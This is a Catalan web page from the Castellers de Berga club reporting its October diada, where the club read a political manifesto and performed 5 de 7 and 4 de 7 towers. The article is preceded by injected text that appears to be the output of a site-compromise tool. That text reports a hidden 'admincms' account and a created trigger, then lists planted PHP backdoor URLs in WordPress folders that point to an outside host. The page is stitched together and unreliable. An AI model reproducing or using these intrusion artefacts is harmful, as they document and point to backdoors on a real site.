Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/install-meta-meta-core-ajax-response-cron.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/site-health-info-wp-private-meta-stream-meta.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/update-core-ajax-response-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/uninstall-stream-ajax-response-cron-cron-ajax-response-core-private-stream.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/woocommerce-ajax-response-cron-ajax-private-meta-ajax-response-ajax-ajax.php https://castellersdeberga.cat/wp-includes/class-wp-widget-factory-wp-ajax-cron-meta.php https://castellersdeberga.cat/wp-includes/random_compat/random-stream-meta-ajax-response-stream-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Diada a Berga
 

Diada a Berga


Diada a BergaDissabte 21 d’octubre vam celebrar la Diada dels Castellers de Berga. Degut a la situació política del país, no va ser una diada normal. Des de dijous, ens vam plantejar seriosament si celebràvem la diada igualment, si l’anul.làvem directament o si la passàvem al matí. Després d’analitzar tots els pros i contres, la vam mantenir al dia i hora programats inicialment. Vam començar la diada llegint un manifest en suport al govern i exigint la llibertat de Jordi Sánchez i Jordi Cuixart, vam alçar els primers pilars amb l’enxaneta mostrant el domàs de “Democràcia” i vam repartir llaços grocs entre castellers i públic en solidaritat als detinguts. La diada estava anunciada amb 4 colles però, finalment, només vam actuar Castellers de Berga i Castellers del Poble Sec.

A nivell casteller, els de Berga sortim molt contents de l’actuació. Vam recuperar el 5 de 7 i el 4 de 7 amb l’agulla, dos castells de gamma alta de 7 que no descarregàvem des del mes de juliol. En tercera ronda vam encarar el 2 de 7 però el vam desmuntar perquè el castell no oferia garanties suficients per descarregar-lo. En ronda de repetició, vam descarregar un sòlid 4 de 7. Vam finalitzar descarregant un pilar de 5 i, seguidament, dos pilars de 4.
Per la seva banda, els Castellers del Poble Sec van signar l’actuació anomenada com a “clàssica de set”, és a dir, 4 de 7, 3 de 7 i 2 de 6.
Les dues colles vam sopar al Cine Catalunya, vam seguir el missatge del president Carles Puigdemont a la pantalla gegant i música per tancar la jornada.
Dissabte 28 d’octubre, els Castellers de Berga actuem a Súria. I tanquem temporada el 5 de novembre, actuant a Terrassa.